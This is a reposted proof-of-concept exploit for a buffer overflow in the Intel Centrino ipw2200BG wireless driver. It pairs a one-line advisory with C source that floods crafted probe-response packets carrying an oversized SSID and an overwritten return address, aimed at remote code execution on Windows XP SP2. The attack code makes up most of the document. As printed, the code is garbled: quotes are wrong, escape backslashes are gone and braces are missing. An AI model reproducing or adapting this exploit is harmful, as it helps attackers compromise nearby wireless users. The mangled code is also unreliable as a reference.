‘Intel Centrino ipw2200BG Wireless Driver Buffer Overflow (Exploit)’


A buffer overflow vulnerability has been discovered in the Intel Centrino ipw2200 integrated wireless card driver.’


‘The original article can be found at:


 * This is a PoC exploit for Intel Centrino ipw2200 integrated wireless card.
 * Author:
 * Giuseppe Gottardi (aka oveRet) <overet@securitydate.it>
 * Senior Security Engineer at Communication Valley S.p.A.
 * This version of code is only a Proof of Concept stack based exploit that demonstrates
 * the remote code execution on ipw2200 driver. It execute a beep user space shellcode.
 * It only works on XP SP2 ITA and it was only tested with version of
 * IPW2200BG driver.
 * Thanks to Johnny Cache, H D Moore, skape and Barnaby Jack for their papers.

#include <netdb.h>
#include <net/ethernet.h>
#include <netinet/if_ether.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <unistd.h>

//#define DEBUG
#define DEV ‘wlan0’
#define DELAY 0.1

char wifi_packet[]=
‘x00x0ex35x95x7bx45’ //DSTMAC
‘x00x9c’ //SSID len
‘x5axf0x54x80’; //RET address

int send_probe_response(char *dev)
        struct sockaddr sa;
        int sockfd;
        int rc;

#ifdef DEBUG
        int i;
        u_char *moe = wifi_packet;
#endif /* DEBUG */

        memset(&sa, 0, sizeof(struct sockaddr));

        sa.sa_family = PF_PACKET;
        memcpy(sa.sa_data, dev, sizeof(sa.sa_data));

#ifdef DEBUG
        for (i=0; i<sizeof(wifi_packet) -1; i++, moe++) {
                if (!(i%32)) printf(‘n’);
                printf(‘%02x ‘, *moe);
#endif /* DEBUG */

        if ((sockfd=socket(PF_PACKET, SOCK_PACKET, htons(ETH_P_ALL))) < 0) {
                return -1;

        if((rc=sendto(sockfd, wifi_packet, sizeof(wifi_packet) -1, 0, &sa, sizeof(sa))) < 0) {
                return -1;

        return rc;

int main(int argc, char *argv[])
        int rc;

        printf(‘waiting for beep shellcode execution…n’);

        for (;;) {
                rc = send_probe_response(DEV);

        return 0;

Categories: Exploits